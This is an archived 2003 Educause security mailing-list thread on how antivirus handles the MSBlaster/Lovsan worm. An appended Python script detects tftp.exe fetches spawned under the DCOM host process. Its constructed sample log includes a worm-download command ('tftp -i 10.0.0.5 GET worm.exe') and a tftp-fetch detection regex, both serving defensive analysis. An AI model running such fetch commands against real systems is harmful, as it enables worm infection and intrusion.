Educause Security Discussion mailing list archives
Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther
From: Gary Dobbins <dobbins () ND EDU>
Date: Tue, 12 Aug 2003 13:15:07 -0500
What we know so far here suggests that the A/V would detect the worm's file(s) as they're being written to disk, *if* scan on write is enabled. But A/V will probably miss the initial incursion, where the attacker initially causes the unwanted behaviour of the victim's DCOM service process. The attacker tells the victim's DCOM to activate tftp.exe, instructing it to fetch its own copy of the actual worm from the attacking machine. At the point tftp writes the received file to disk, A/V software may be able to catch it, but the victim is already under the worm's control at this point.

Assuming a variant strain of the worm doesn't appear, a positive A/V alert indicates both presence of the vulnerability and success of attack against the recipient.

Am surprised, actually, that the author wrote this worm to rely on presence of tftp.exe. Local tftp was used by 'ancient' worms such as nimda, and some nimda remediation recommendations included removing tftp.exe from machines where it wasn't needed.

Jim Moore wrote:
I am trying to understand how far Stealther and MBlaster/Lovsan-A get before the latest antivirus intercepts them. What has alarmed me is that I have some reports of a reboot preceding the A/V warning.

Also, I am assuming that the most effective is when A/V is set to scan on every write. However, you know that impacts performance and a lot of people slide back to scanning at lunch time, or in the evening. I assume that means that is then the window of opportunity for MBlaster.

I am not an A/V expert; can someone validate assumptions, and describe how you handle it in communication to your end user community?

Jim

--
Jim Moore, CISSP, IAM
Information Security Officer
Rochester Institute of Technology
13 Lomb Memorial Drive
Rochester, NY 14623-5603
Telephone: (585)475-5406
Fax: (585)475-7950
PGP (jimmoore () mail rit edu): 9C33 0328 CD59 B602 82B8 8521 0DC9 963C D0C0

**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
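The infection chain Gary describes (the exploited DCOM service process spawns tftp.exe, tftp pulls the worm from the attacker, and only the resulting disk write gives scan-on-write A/V something to alert on) can be checked from process-creation telemetry rather than waited for in the A/V log. The script below is an added example written for this archive page, not code posted in the thread or from any product: it parses a constructed, made-up log format (field names, PIDs, hosts and the file name worm.exe are all assumptions), walks each tftp.exe GET back to its parent chain, flags fetches that descend from svchost.exe (assumed here to be the process hosting the RPC/DCOM service on Windows 2000/XP), and reports how long after the fetch the A/V on-write alert arrived, which illustrates the point that the A/V alert confirms an attack that has already succeeded.

```python
"""Correlate tftp.exe fetches spawned under the RPC/DCOM host process with the
A/V on-write alert that follows them.

Added example, not code from the original thread. The log format and every
event below are constructed; the field names are not any real product's schema.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Assumption: on Windows 2000/XP the RPC/DCOM service (RpcSs) ran inside
# svchost.exe, so that is the ancestor treated as the exploited process.
RPC_HOST_IMAGES = {"svchost.exe"}

# Constructed sample telemetry (not real data). Assumed format: ts|kind|key=value|...
SAMPLE_LOG = r"""
2003-08-12T13:01:02|proc|pid=1040|ppid=1020|image=svchost.exe|cmdline=svchost.exe -k rpcss
2003-08-12T13:01:05|proc|pid=1320|ppid=1040|image=cmd.exe|cmdline=cmd.exe
2003-08-12T13:01:06|proc|pid=1328|ppid=1320|image=tftp.exe|cmdline=tftp -i 10.0.0.5 GET worm.exe
2003-08-12T13:01:08|proc|pid=1336|ppid=1320|image=worm.exe|cmdline=worm.exe
2003-08-12T13:01:09|av|path=C:\WINDOWS\system32\worm.exe|result=quarantined
2003-08-12T13:05:00|proc|pid=1500|ppid=600|image=explorer.exe|cmdline=explorer.exe
2003-08-12T13:06:00|proc|pid=1520|ppid=1500|image=tftp.exe|cmdline=tftp 10.0.0.20 GET config.bin
2003-08-12T13:06:30|proc|pid=1528|ppid=1500|image=tftp.exe|cmdline=tftp -i 10.0.0.9 PUT notes.txt
"""


@dataclass
class Proc:
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class AvAlert:
    ts: datetime
    path: str
    result: str


@dataclass
class Finding:
    pid: int
    ancestry: List[str]          # tftp.exe first, oldest known ancestor last
    source: str                  # host the file was pulled from
    fetched: str                 # file name requested with GET
    from_rpc_host: bool          # some ancestor is in RPC_HOST_IMAGES
    av_delay_s: Optional[float]  # seconds until A/V alerted on the written file


LINE_RE = re.compile(r"^(?P<ts>\S+)\|(?P<kind>proc|av)\|(?P<rest>.+)$")
# tftp [-i] <host> GET <file>; uploads (PUT) and interactive use do not match.
TFTP_GET_RE = re.compile(
    r"\btftp(?:\.exe)?\b\s+(?:-i\s+)?(?P<src>\S+)\s+get\s+(?P<file>\S+)", re.I)


def parse(log: str):
    """Split the constructed log into process-creation events and A/V alerts."""
    procs: List[Proc] = []
    alerts: List[AvAlert] = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank or unrecognised line
        ts = datetime.fromisoformat(m.group("ts"))
        kv = dict(part.split("=", 1) for part in m.group("rest").split("|"))
        if m.group("kind") == "proc":
            procs.append(Proc(ts, int(kv["pid"]), int(kv["ppid"]),
                              kv["image"].lower(), kv["cmdline"]))
        else:
            alerts.append(AvAlert(ts, kv["path"], kv["result"]))
    return procs, alerts


def ancestry(proc: Proc, by_pid: Dict[int, Proc]) -> List[str]:
    """Walk the parent chain as far as the log lets us; stop on unknown or looping PIDs."""
    chain, seen, cur = [proc.image], {proc.pid}, proc
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur.image)
    return chain


def find_tftp_fetches(log: str) -> List[Finding]:
    """Return one Finding per tftp.exe GET, correlated with the first later A/V alert on that file."""
    procs, alerts = parse(log)
    by_pid = {p.pid: p for p in procs}
    findings: List[Finding] = []
    for p in procs:
        if p.image != "tftp.exe":
            continue
        m = TFTP_GET_RE.search(p.cmdline)
        if not m:
            continue
        chain = ancestry(p, by_pid)
        fetched = m.group("file")
        delay = None
        for a in alerts:
            basename = a.path.replace("\\", "/").rsplit("/", 1)[-1]
            if a.ts >= p.ts and basename.lower() == fetched.lower():
                delay = (a.ts - p.ts).total_seconds()
                break
        findings.append(Finding(p.pid, chain, m.group("src"), fetched,
                                any(img in RPC_HOST_IMAGES for img in chain[1:]), delay))
    return findings


if __name__ == "__main__":
    for f in find_tftp_fetches(SAMPLE_LOG):
        sev = "HIGH" if f.from_rpc_host else "low"
        when = (f"A/V alert {f.av_delay_s:.0f}s after the fetch"
                if f.av_delay_s is not None else "no A/V alert seen")
        print(f"[{sev}] pid {f.pid}: {' <- '.join(f.ancestry)} pulled "
              f"{f.fetched} from {f.source}; {when}")
```

On the sample data the first fetch descends from svchost.exe and is followed three seconds later by the quarantine alert, which is the ordering Gary describes: the process-creation event is the earlier signal, and the A/V alert arrives after the host is already compromised. The explorer.exe-spawned GET is reported at low severity so that legitimate tftp use is visible but not treated as the same event, and the PUT is ignored.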
Current thread:
- Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- <Possible follow-ups>
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Gary Dobbins (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Omar Herrera (Aug 12)